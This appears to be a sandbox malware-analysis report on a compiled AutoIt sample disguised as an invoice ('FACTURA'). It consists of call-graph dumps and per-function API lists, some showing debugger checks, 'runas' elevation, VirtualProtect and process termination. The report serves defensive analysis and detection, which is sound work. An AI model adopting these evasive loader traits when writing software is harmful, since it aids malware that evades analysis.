API calls 105999->106001 106000 f0d590 106002 ed7bcc 59 API calls 106000->106002 106001->106009 106002->106009 106003 ed79f2 59 API calls 106003->106009 106005->105875 106006->106000 106007 f0d57b 106006->106007 106008 ed7bcc 59 API calls 106007->106008 106008->106009 106009->105979 106009->106003 106046 ed7924 59 API calls 2 library calls 106009->106046 106010->105899 106011->105899 106012->105899 106013->105899 106014->105899 106015->105899 106016->105899 106018 ed5c79 106017->106018 106019 ed5c88 106017->106019 106018->105898 106019->106018 106020 ed5c8d CloseHandle 106019->106020 106020->106018 106021->105844 106022->105849 106023->105929 106024->105925 106025->105925 106026->105925 106027->105925 106028->105903 106029->105906 106030->105927 106031->105907 106032->105912 106034 ed785a 106033->106034 106035 ed78b7 106033->106035 106034->106035 106036 ed7865 106034->106036 106037 ed7d2c 59 API calls 106035->106037 106038 f0eb09 106036->106038 106039 ed7880 106036->106039 106043 ed7888 _memmove 106037->106043 106041 ed8029 59 API calls 106038->106041 106047 ed7f27 59 API calls Mailbox 106039->106047 106042 f0eb13 106041->106042 106044 ef0db6 Mailbox 59 API calls 106042->106044 106043->105983 106045 f0eb33 106044->106045 106046->106009 106047->106043 106049 ed6ea9 106048->106049 106050 ed6d95 106048->106050 106049->104717 106050->106049 106051 ef0db6 Mailbox 59 API calls 106050->106051 106053 ed6dbc 106051->106053 106052 ef0db6 Mailbox 59 API calls 106054 ed6e31 106052->106054 106053->106052 106054->106049 106056 ed735d 59 API calls 106054->106056 106058 ed750f 59 API calls 106054->106058 106061 ed6240 106054->106061 106086 f26553 59 API calls Mailbox 106054->106086 106056->106054 106058->106054 106059->104719 106060->104721 106087 ed7a16 106061->106087 106063 ed646a 106064 ed750f 59 API calls 106063->106064 106065 ed6484 Mailbox 106064->106065 106065->106054 106068 f0dff6 106096 f2f8aa 92 API calls 4 library calls 106068->106096 106069 ed7d8c 59 API calls 106080 ed6265 106069->106080 106072 ed750f 59 API calls 106072->106080 106074 f0e004 106075 ed750f 59 API calls 106074->106075 106076 f0e01a 106075->106076 106076->106065 106077 ed6799 _memmove 106097 f2f8aa 92 API calls 4 library calls 106077->106097 106078 f0df92 106079 ed8029 59 API calls 106078->106079 106081 f0df9d 106079->106081 106080->106063 106080->106068 106080->106069 106080->106072 106080->106077 106080->106078 106083 ed7e4f 59 API calls 106080->106083 106092 ed5f6c 60 API calls 106080->106092 106093 ed5d41 59 API calls Mailbox 106080->106093 106094 ed5e72 60 API calls 106080->106094 106095 ed7924 59 API calls 2 library calls 106080->106095 106085 ef0db6 Mailbox 59 API calls 106081->106085 106084 ed643b CharUpperBuffW 106083->106084 106084->106080 106085->106077 106086->106054 106088 ef0db6 Mailbox 59 API calls 106087->106088 106089 ed7a3b 106088->106089 106090 ed8029 59 API calls 106089->106090 106091 ed7a4a 106090->106091 106091->106080 106092->106080 106093->106080 106094->106080 106095->106080 106096->106074 106097->106065 106099 ed30d2 LoadIconW 106098->106099 106101 ed3107 106099->106101 106101->104737 106102->104736 106104 f0d423 106103->106104 106105 ed4196 106103->106105 106104->106105 106106 f0d42c DestroyCursor 106104->106106 106105->104742 106129 f32f94 62 API calls _W_store_winword 106105->106129 106106->106105 106108 ed4098 106107->106108 106128 ed416f Mailbox 106107->106128 106129->104742 106131 ede6d5 106130->106131 106132 f13aa9 106131->106132 106135 ede73f 106131->106135 106144 ede799 106131->106144 106300 ed9ea0 106132->106300 106138 ed7667 59 API calls 106135->106138 106135->106144 106136 ed7667 59 API calls 106136->106144 106139 f13b04 106138->106139 106140 ef2d40 __cinit 67 API calls 106140->106144 106142 f13b26 106142->104817 106143 ed84c0 69 API calls 106146 ede970 Mailbox 106143->106146 106144->106136 106144->106140 106144->106142 106145 ede95a 106144->106145 106144->106146 106145->106146 106325 f39e4a 90 API calls 4 library calls 106145->106325 106146->106143 106147 ed9ea0 332 API calls 106146->106147 106151 edf195 106146->106151 106152 f39e4a 90 API calls 106146->106152 106155 ed8d40 59 API calls 106146->106155 106160 edea78 106146->106160 106299 ed7f77 59 API calls 2 library calls 106146->106299 106326 f26e8f 59 API calls 106146->106326 106327 f4c5c3 332 API calls 106146->106327 106328 f4b53c 332 API calls Mailbox 106146->106328 106330 ed9c90 59 API calls Mailbox 106146->106330 106331 f493c6 332 API calls Mailbox 106146->106331 106147->106146 106152->106146 106155->106146 106160->104817 106162 edf4ba 106161->106162 106163 edf650 106161->106163 106164 edf4c6 106162->106164 106165 f1441e 106162->106165 106166 ed7de1 59 API calls 106163->106166 106430 edf290 332 API calls 2 library calls 106164->106430 106432 f4bc6b 332 API calls Mailbox 106165->106432 106173 edf58c Mailbox 106166->106173 106170 f1442c 106172 edf4fd 106172->106170 106172->106173 106177 ed4e4a 84 API calls 106173->106177 106338 f33c37 106173->106338 106341 f3cb7a 106173->106341 106421 f4445a 106173->106421 106175 edf5e3 106177->106175 106559 ed8180 106180->106559 106182 edfd3d 106184 f1472d 106182->106184 106229 ee06f6 106182->106229 106564 edf234 106182->106564 106581 f39e4a 90 API calls 4 library calls 106184->106581 106260->104817 106261->104817 106262->104755 106264->104817 106265->104762 106266->104762 106267->104762 106268->104817 106269->104817 106270->104817 106272 ed984b 106271->106272 106273 ed9851 106271->106273 106272->104817 106274 f0f5d3 __i64tow 106273->106274 106275 ed9899 106273->106275 106277 ed9857 __itow 106273->106277 106280 f0f4da 106273->106280 106601 ef3698 84 API calls 3 library calls 106275->106601 106279 ef0db6 Mailbox 59 API calls 106277->106279 106281 ed9871 106279->106281 106282 ef0db6 Mailbox 59 API calls 106280->106282 106284 f0f552 Mailbox _wcscpy 106280->106284 106281->106272 106285 f0f51f 106282->106285 106602 ef3698 84 API calls 3 library calls 106284->106602 106289->104817 106290->104817 106291->104817 106292->104811 106293->104811 106294->104811 106295->104811 106296->104811 106297->104811 106298->104811 106299->106146 106301 ed9ebf 106300->106301 106318 ed9eed Mailbox 106300->106318 106304 edb475 106306 edb47a 106307 f10055 106306->106307 106310 ef0db6 59 API calls Mailbox 106310->106318 106318->106304 106318->106306 106318->106307 106318->106310 106325->106146 106326->106146 106327->106146 106328->106146 106330->106146 106331->106146 106430->106172 106432->106170 106560 ed818f 106559->106560 106563 ed81aa 106559->106563 106561 ed7e4f 59 API calls 106560->106561 106562 ed8197 CharUpperBuffW 106561->106562 106562->106563 106563->106182 106565 edf251 106564->106565 106601->106277 106602->106274 106604 ed7a5f 106603->106604 106608 ed7a85 _memmove 106603->106608 106605 ef0db6 Mailbox 59 API calls 106604->106605 106604->106608 106606 ed7ad4 106605->106606 106607 ef0db6 Mailbox 59 API calls 106606->106607 106607->106608 106608->104834 106609->104835 106610 ed1066 106615 edf76f 106610->106615 106612 ed106c 106613 ef2d40 __cinit 67 API calls 106612->106613 106614 ed1076 106613->106614 106616 edf790 106615->106616 106648 eeff03 106616->106648 106620 edf7d7 106621 ed7667 59 API calls 106620->106621 106622 edf7e1 106621->106622 106623 ed7667 59 API calls 106622->106623 106624 edf7eb 106623->106624 106625 ed7667 59 API calls 106624->106625 106626 edf7f5 106625->106626 106627 ed7667 59 API calls 106626->106627 106628 edf833 106627->106628 106629 ed7667 59 API calls 106628->106629 106630 edf8fe 106629->106630 106658 ee5f87 106630->106658 106634 edf930 106635 ed7667 59 API calls 106634->106635 106636 edf93a 106635->106636 106686 eefd9e 106636->106686 106638 edf981 106639 edf991 GetStdHandle 106638->106639 106640 edf9dd 106639->106640 106641 f145ab 106639->106641 106642 edf9e5 OleInitialize 106640->106642 106641->106640 106643 f145b4 106641->106643 106642->106612 106693 f36b38 64 API calls Mailbox 106643->106693 106645 f145bb 106694 f37207 CreateThread 106645->106694 106647 f145c7 CloseHandle 106647->106642 106695 eeffdc 106648->106695 106651 eeffdc 59 API calls 106652 eeff45 106651->106652 106653 ed7667 59 API calls 106652->106653 106654 eeff51 106653->106654 106655 ed7bcc 59 API calls 106654->106655 106656 edf796 106655->106656 106657 ef0162 6 API calls 106656->106657 106657->106620 106659 ed7667 59 API calls 106658->106659 106660 ee5f97 106659->106660 106661 ed7667 59 API calls 106660->106661 106662 ee5f9f 106661->106662 106702 ee5a9d 106662->106702 106665 ee5a9d 59 API calls 106666 ee5faf 106665->106666 106667 ed7667 59 API calls 106666->106667 106668 ee5fba 106667->106668 106669 ef0db6 Mailbox 59 API calls 106668->106669 106670 edf908 106669->106670 106671 ee60f9 106670->106671 106672 ee6107 106671->106672 106673 ed7667 59 API calls 106672->106673 106674 ee6112 106673->106674 106675 ed7667 59 API calls 106674->106675 106676 ee611d 106675->106676 106677 ed7667 59 API calls 106676->106677 106678 ee6128 106677->106678 106679 ed7667 59 API calls 106678->106679 106680 ee6133 106679->106680 106681 ee5a9d 59 API calls 106680->106681 106682 ee613e 106681->106682 106683 ef0db6 Mailbox 59 API calls 106682->106683 106684 ee6145 RegisterClipboardFormatW 106683->106684 106684->106634 106687 eefdae 106686->106687 106688 f2576f 106686->106688 106690 ef0db6 Mailbox 59 API calls 106687->106690 106705 f39ae7 60 API calls 106688->106705 106691 eefdb6 106690->106691 106691->106638 106692 f2577a 106693->106645 106694->106647 106706 f371ed 65 API calls 106694->106706 106696 ed7667 59 API calls 106695->106696 106697 eeffe7 106696->106697 106698 ed7667 59 API calls 106697->106698 106699 eeffef 106698->106699 106700 ed7667 59 API calls 106699->106700 106701 eeff3b 106700->106701 106701->106651 106703 ed7667 59 API calls 106702->106703 106704 ee5aa5 106703->106704 106704->106665 106705->106692 106707 ed1016 106712 ed4974 106707->106712 106710 ef2d40 __cinit 67 API calls 106711 ed1025 106710->106711 106713 ef0db6 Mailbox 59 API calls 106712->106713 106714 ed497c 106713->106714 106715 ed101b 106714->106715 106719 ed4936 106714->106719 106715->106710 106720 ed493f 106719->106720 106721 ed4951 106719->106721 106722 ef2d40 __cinit 67 API calls 106720->106722 106723 ed49a0 106721->106723 106722->106721 106724 ed7667 59 API calls 106723->106724 106725 ed49b8 GetVersionExW 106724->106725 106726 ed7bcc 59 API calls 106725->106726 106727 ed49fb 106726->106727 106728 ed7d2c 59 API calls 106727->106728 106733 ed4a28 106727->106733 106729 ed4a1c 106728->106729 106730 ed7726 59 API calls 106729->106730 106730->106733 106731 ed4a93 GetCurrentProcess IsWow64Process 106732 ed4aac 106731->106732 106735 ed4b2b GetSystemInfo 106732->106735 106736 ed4ac2 106732->106736 106733->106731 106734 f0d864 106733->106734 106737 ed4af8 106735->106737 106747 ed4b37 106736->106747 106737->106715 106740 ed4b1f GetSystemInfo 106742 ed4ae9 106740->106742 106741 ed4ad4 106743 ed4b37 2 API calls 106741->106743 106742->106737 106745 ed4aef FreeLibrary 106742->106745 106744 ed4adc GetNativeSystemInfo 106743->106744 106744->106742 106745->106737 106748 ed4ad0 106747->106748 106749 ed4b40 LoadLibraryA 106747->106749 106748->106740 106748->106741 106749->106748 106750 ed4b51 GetProcAddress 106749->106750 106750->106748 106751 f0fdfc 106790 edab30 Mailbox _memmove 106751->106790 106755 ef0db6 59 API calls Mailbox 106755->106790 106758 edb525 106818 f39e4a 90 API calls 4 library calls 106758->106818 106759 ef0db6 59 API calls Mailbox 106780 ed9f37 Mailbox 106759->106780 106760 f10055 106817 f39e4a 90 API calls 4 library calls 106760->106817 106764 edb475 106768 ed8047 59 API calls 106764->106768 106765 f10064 106773 eda057 106768->106773 106769 edb47a 106769->106760 106779 f109e5 106769->106779 106770 ed8047 59 API calls 106770->106780 106772 ed7667 59 API calls 106772->106780 106774 f26e8f 59 API calls 106774->106780 106775 ed7de1 59 API calls 106775->106790 106776 ef2d40 67 API calls __cinit 106776->106780 106777 f109d6 106823 f39e4a 90 API calls 4 library calls 106777->106823 106824 f39e4a 90 API calls 4 library calls 106779->106824 106780->106759 106780->106760 106780->106764 106780->106769 106780->106770 106780->106772 106780->106773 106780->106774 106780->106776 106780->106777 106781 eda55a 106780->106781 106806 edc8c0 332 API calls 2 library calls 106780->106806 106807 edb900 60 API calls Mailbox 106780->106807 106822 f39e4a 90 API calls 4 library calls 106781->106822 106784 edb2b6 106811 edf6a3 332 API calls 106784->106811 106785 ed9ea0 332 API calls 106785->106790 106787 f1086a 106820 ed9c90 59 API calls Mailbox 106787->106820 106789 f10878 106821 f39e4a 90 API calls 4 library calls 106789->106821 106790->106755 106790->106758 106790->106773 106790->106775 106790->106780 106790->106784 106790->106785 106790->106787 106790->106789 106792 f1085c 106790->106792 106793 edb21c 106790->106793 106797 f26e8f 59 API calls 106790->106797 106800 f4df23 106790->106800 106803 f4df37 106790->106803 106808 ed9c90 59 API calls Mailbox 106790->106808 106812 f4c193 86 API calls 2 library calls 106790->106812 106813 f4c2e0 97 API calls Mailbox 106790->106813 106814 f37956 59 API calls Mailbox 106790->106814 106815 f4bc6b 332 API calls Mailbox 106790->106815 106816 f2617e 59 API calls Mailbox 106790->106816 106792->106773 106819 f2617e 59 API calls Mailbox 106792->106819 106809 ed9d3c 60 API calls Mailbox 106793->106809 106795 edb22d 106810 ed9d3c 60 API calls Mailbox 106795->106810 106797->106790 106825 f4cadd 106800->106825 106802 f4df33 106802->106790 106804 f4cadd 131 API calls 106803->106804 106805 f4df47 106804->106805 106805->106790 106806->106780 106807->106780 106808->106790 106809->106795 106810->106784 106811->106758 106812->106790 106813->106790 106814->106790 106815->106790 106816->106790 106817->106765 106818->106792 106819->106773 106820->106792 106821->106792 106822->106773 106823->106779 106824->106773 106826 ed9837 85 API calls 106825->106826 106827 f4cb1a 106826->106827 106850 f4cb61 Mailbox 106827->106850 106863 f4d7a5 106827->106863 106829 f4cdb9 106830 f4cf2e 106829->106830 106834 f4cdc7 106829->106834 106902 f4d8c8 93 API calls Mailbox 106830->106902 106833 f4cf3d 106833->106834 106836 f4cf49 106833->106836 106876 f4c96e 106834->106876 106835 ed9837 85 API calls 106854 f4cbb2 Mailbox 106835->106854 106836->106850 106841 f4ce00 106891 ef0c08 106841->106891 106844 f4ce33 106847 ed92ce 59 API calls 106844->106847 106845 f4ce1a 106897 f39e4a 90 API calls 4 library calls 106845->106897 106849 f4ce3f 106847->106849 106848 f4ce25 GetCurrentProcess TerminateProcess 106848->106844 106851 ed9050 59 API calls 106849->106851 106850->106802 106852 f4ce55 106851->106852 106862 f4ce7c 106852->106862 106898 ed8d40 59 API calls Mailbox 106852->106898 106854->106829 106854->106835 106854->106850 106895 f4fbce 59 API calls 2 library calls 106854->106895 106896 f4cfdf 61 API calls 2 library calls 106854->106896 106855 f4cfa4 106855->106850 106859 f4cfb8 FreeLibrary 106855->106859 106856 f4ce6b 106899 f4d649 108 API calls _free 106856->106899 106859->106850 106862->106855 106900 ed8d40 59 API calls Mailbox 106862->106900 106901 ed9d3c 60 API calls Mailbox 106862->106901 106903 f4d649 108 API calls _free 106862->106903 106864 ed7e4f 59 API calls 106863->106864 106865 f4d7c0 CharLowerBuffW 106864->106865 106904 f2f167 106865->106904 106869 ed7667 59 API calls 106870 f4d7f9 106869->106870 106871 ed784b 59 API calls 106870->106871 106872 f4d810 106871->106872 106874 ed7d2c 59 API calls 106872->106874 106873 f4d858 Mailbox 106873->106854 106875 f4d81c Mailbox 106874->106875 106875->106873 106911 f4cfdf 61 API calls 2 library calls 106875->106911 106877 f4c989 106876->106877 106881 f4c9de 106876->106881 106878 ef0db6 Mailbox 59 API calls 106877->106878 106880 f4c9ab 106878->106880 106879 ef0db6 Mailbox 59 API calls 106879->106880 106880->106879 106880->106881 106882 f4da50 106881->106882 106883 f4dc79 Mailbox 106882->106883 106890 f4da73 _strcat _wcscpy __NMSG_WRITE 106882->106890 106883->106841 106884 ed9be6 59 API calls 106884->106890 106885 ed9b3c 59 API calls 106885->106890 106886 ed9b98 59 API calls 106886->106890 106887 ef571c 58 API calls _W_store_winword 106887->106890 106888 ed9837 85 API calls 106888->106890 106890->106883 106890->106884 106890->106885 106890->106886 106890->106887 106890->106888 106914 f35887 61 API calls 2 library calls 106890->106914 106892 ef0c1d 106891->106892 106893 ef0cb5 VirtualProtect 106892->106893 106894 ef0c83 106892->106894 106893->106894 106894->106844 106894->106845 106895->106854 106896->106854 106897->106848 106898->106856 106899->106862 106900->106862 106901->106862 106902->106833 106903->106862 106905 f2f192 __NMSG_WRITE 106904->106905 106906 f2f1c7 106905->106906 106907 f2f278 106905->106907 106910 f2f1d1 106905->106910 106906->106910 106912 ed78c4 61 API calls 106906->106912 106907->106910 106913 ed78c4 61 API calls 106907->106913 106910->106869 106910->106875 106911->106873 106912->106906 106913->106907 106914->106890 106915 ed3633 106916 ed366a 106915->106916 106917 ed3688 106916->106917 106918 ed36e7 106916->106918 106954 ed36e5 106916->106954 106919 ed374b PostQuitMessage 106917->106919 106920 ed3695 106917->106920 106922 ed36ed 106918->106922 106923 f0d0cc 106918->106923 106957 ed36d8 106919->106957 106925 f0d154 106920->106925 106926 ed36a0 106920->106926 106921 ed36ca NtdllDefWindowProc_W 106921->106957 106927 ed3715 SetTimer RegisterClipboardFormatW 106922->106927 106928 ed36f2 106922->106928 106964 ee1070 10 API calls Mailbox 106923->106964 106969 f32527 71 API calls _memset 106925->106969 106930 ed36a8 106926->106930 106931 ed3755 106926->106931 106932 ed373e CreatePopupMenu 106927->106932 106927->106957 106934 ed36f9 KillTimer 106928->106934 106935 f0d06f 106928->106935 106929 f0d0f3 106965 ee1093 332 API calls Mailbox 106929->106965 106937 ed36b3 106930->106937 106942 f0d139 106930->106942 106962 ed44a0 64 API calls _memset 106931->106962 106932->106957 106960 ed443a Shell_NotifyIconW _memset 106934->106960 106939 f0d074 106935->106939 106940 f0d0a8 MoveWindow 106935->106940 106943 ed36be 106937->106943 106944 f0d124 106937->106944 106947 f0d097 SetFocus 106939->106947 106948 f0d078 106939->106948 106940->106957 106942->106921 106968 f27c36 59 API calls Mailbox 106942->106968 106943->106921 106966 ed443a Shell_NotifyIconW _memset 106943->106966 106967 f32d36 81 API calls _memset 106944->106967 106945 f0d166 106945->106921 106945->106957 106946 ed3764 106946->106957 106947->106957 106948->106943 106952 f0d081 106948->106952 106949 ed370c 106961 ed3114 DeleteObject DestroyWindow Mailbox 106949->106961 106963 ee1070 10 API calls Mailbox 106952->106963 106954->106921 106958 f0d118 106959 ed434a 68 API calls 106958->106959 106959->106954 106960->106949 106961->106957 106962->106946 106963->106957 106964->106929 106965->106943 106966->106958 106967->106946 106968->106954 106969->106945 106970 116f208 106984 116ce28 106970->106984 106972 116f308 106988 116f0f8 106972->106988 106985 116ce3c 106984->106985 106991 1170358 GetPEB 106985->106991 106987 116d4b3 106987->106972 106989 116f101 Sleep 106988->106989 106990 116f10f 106989->106990 106992 1170382 106991->106992 106992->106987 106993 f1416f 106997 f25fe6 106993->106997 106995 f1417a 106996 f25fe6 86 API calls 106995->106996 106996->106995 107003 f26020 106997->107003 107005 f25ff3 106997->107005 106998 f26022 107009 ed9328 85 API calls Mailbox 106998->107009 107000 f26027 107001 ed9837 85 API calls 107000->107001 107002 f2602e 107001->107002 107004 ed7b2e 59 API calls 107002->107004 107003->106995 107004->107003 107005->106998 107005->107000 107005->107003 107006 f2601a 107005->107006 107008 ed95a0 59 API calls _wcsstr 107006->107008 107008->107003 107009->107000

                                                                            Executed Functions

                                                                            Function 00ED3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED3B68
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00ED3B7A
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F952F8,00F952E0,?,?), ref: 00ED3BEB
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                              • Part of subcall function 00EE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00ED3C14,00F952F8,?,?,?), ref: 00EE096E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED3C6F
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F87770,00000010), ref: 00F0D281
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00F952F8,?,?,?), ref: 00F0D2B9
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F84260,00F952F8,?,?,?), ref: 00F0D33F
                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F0D346
                                                                              • Part of subcall function 00ED3A46: GetSysColorBrush.USER32(0000000F), ref: 00ED3A50
                                                                              • Part of subcall function 00ED3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00ED3A5F
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(00000063), ref: 00ED3A76
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(000000A4), ref: 00ED3A88
                                                                              • Part of subcall function 00ED3A46: LoadIconW.USER32(000000A2), ref: 00ED3A9A
                                                                              • Part of subcall function 00ED3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00ED3AC0
                                                                              • Part of subcall function 00ED3A46: RegisterClassExW.USER32(?), ref: 00ED3B16
                                                                              • Part of subcall function 00ED39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00ED3A03
                                                                              • Part of subcall function 00ED39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00ED3A24
                                                                              • Part of subcall function 00ED39D5: ShowWindow.USER32(00000000,?,?), ref: 00ED3A38
                                                                              • Part of subcall function 00ED39D5: ShowWindow.USER32(00000000,?,?), ref: 00ED3A41
                                                                              • Part of subcall function 00ED434A: _memset.LIBCMT ref: 00ED4370
                                                                              • Part of subcall function 00ED434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00ED4415
                                                                            Strings
                                                                            • This is a third-party compiled AutoIt script., xrefs: 00F0D279
                                                                            • runas, xrefs: 00F0D33A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                            • API String ID: 529118366-3287110873
                                                                            • Opcode ID: a9986c08b5429f99637436d7246785bd08fc1a0959e0667df1aa4ffc5530682a
                                                                            • Instruction ID: 2b5758d55811e46b5416571133f75483a7cf871cac6aa687bfb6b5499229e39d
                                                                            • Opcode Fuzzy Hash: a9986c08b5429f99637436d7246785bd08fc1a0959e0667df1aa4ffc5530682a
                                                                            • Instruction Fuzzy Hash: 46510870D0824CAEDF12EBB4DC05EEDBBB4EB45750F005067F551B22A2DA709606FB22
                                                                            Function 00ED3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 765 ed3633-ed3681 767 ed36e1-ed36e3 765->767 768 ed3683-ed3686 765->768 767->768 771 ed36e5 767->771 769 ed3688-ed368f 768->769 770 ed36e7 768->770 772 ed374b-ed3753 PostQuitMessage 769->772 773 ed3695-ed369a 769->773 775 ed36ed-ed36f0 770->775 776 f0d0cc-f0d0fa call ee1070 call ee1093 770->776 774 ed36ca-ed36d2 NtdllDefWindowProc_W 771->774 780 ed3711-ed3713 772->780 778 f0d154-f0d168 call f32527 773->778 779 ed36a0-ed36a2 773->779 781 ed36d8-ed36de 774->781 782 ed3715-ed373c SetTimer RegisterClipboardFormatW 775->782 783 ed36f2-ed36f3 775->783 810 f0d0ff-f0d106 776->810 778->780 803 f0d16e 778->803 785 ed36a8-ed36ad 779->785 786 ed3755-ed3764 call ed44a0 779->786 780->781 782->780 787 ed373e-ed3749 CreatePopupMenu 782->787 789 ed36f9-ed370c KillTimer call ed443a call ed3114 783->789 790 f0d06f-f0d072 783->790 792 f0d139-f0d140 785->792 793 ed36b3-ed36b8 785->793 786->780 787->780 789->780 796 f0d074-f0d076 790->796 797 f0d0a8-f0d0c7 MoveWindow 790->797 792->774 799 f0d146-f0d14f call f27c36 792->799 801 ed36be-ed36c4 793->801 802 f0d124-f0d134 call f32d36 793->802 805 f0d097-f0d0a3 SetFocus 796->805 806 f0d078-f0d07b 796->806 797->780 799->774 801->774 801->810 802->780 803->774 805->780 806->801 811 f0d081-f0d092 call ee1070 806->811 810->774 814 f0d10c-f0d11f call ed443a call ed434a 810->814 811->780 814->774
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00ED36D2
                                                                            • KillTimer.USER32(?,00000001), ref: 00ED36FC
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ED371F
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED372A
                                                                            • CreatePopupMenu.USER32 ref: 00ED373E
                                                                            • PostQuitMessage.USER32(00000000), ref: 00ED374D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 157504867-2362178303
                                                                            • Opcode ID: e15fd036cd7c60a0f52e824ccdbad4d9e01d7463c79dad4e9252a4fa6e110f48
                                                                            • Instruction ID: e126c13b066a10d7e8a37cebad7fda85f9da9a3593cdd7102f549b1ed04b59da
                                                                            • Opcode Fuzzy Hash: e15fd036cd7c60a0f52e824ccdbad4d9e01d7463c79dad4e9252a4fa6e110f48
                                                                            • Instruction Fuzzy Hash: 02412BB1500A09BBDF15AF74EC09BBA3B94EB04701F102127F601B63E2CA719E46B763
                                                                            Function 00ED49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 948 ed49a0-ed4a00 call ed7667 GetVersionExW call ed7bcc 953 ed4b0b-ed4b0d 948->953 954 ed4a06 948->954 956 f0d767-f0d773 953->956 955 ed4a09-ed4a0e 954->955 958 ed4a14 955->958 959 ed4b12-ed4b13 955->959 957 f0d774-f0d778 956->957 960 f0d77a 957->960 961 f0d77b-f0d787 957->961 962 ed4a15-ed4a4c call ed7d2c call ed7726 958->962 959->962 960->961 961->957 963 f0d789-f0d78e 961->963 971 f0d864-f0d867 962->971 972 ed4a52-ed4a53 962->972 963->955 965 f0d794-f0d79b 963->965 965->956 967 f0d79d 965->967 970 f0d7a2-f0d7a5 967->970 973 f0d7ab-f0d7c9 970->973 974 ed4a93-ed4aaa GetCurrentProcess IsWow64Process 970->974 975 f0d880-f0d884 971->975 976 f0d869 971->976 972->970 977 ed4a59-ed4a64 972->977 973->974 982 f0d7cf-f0d7d5 973->982 980 ed4aac 974->980 981 ed4aaf-ed4ac0 974->981 978 f0d886-f0d88f 975->978 979 f0d86f-f0d878 975->979 983 f0d86c 976->983 984 ed4a6a-ed4a6c 977->984 985 f0d7ea-f0d7f0 977->985 978->983 988 f0d891-f0d894 978->988 979->975 980->981 989 ed4b2b-ed4b35 GetSystemInfo 981->989 990 ed4ac2-ed4ad2 call ed4b37 981->990 991 f0d7d7-f0d7da 982->991 992 f0d7df-f0d7e5 982->992 983->979 993 f0d805-f0d811 984->993 994 ed4a72-ed4a75 984->994 986 f0d7f2-f0d7f5 985->986 987 f0d7fa-f0d800 985->987 986->974 987->974 988->979 995 ed4af8-ed4b08 989->995 1005 ed4b1f-ed4b29 GetSystemInfo 990->1005 1006 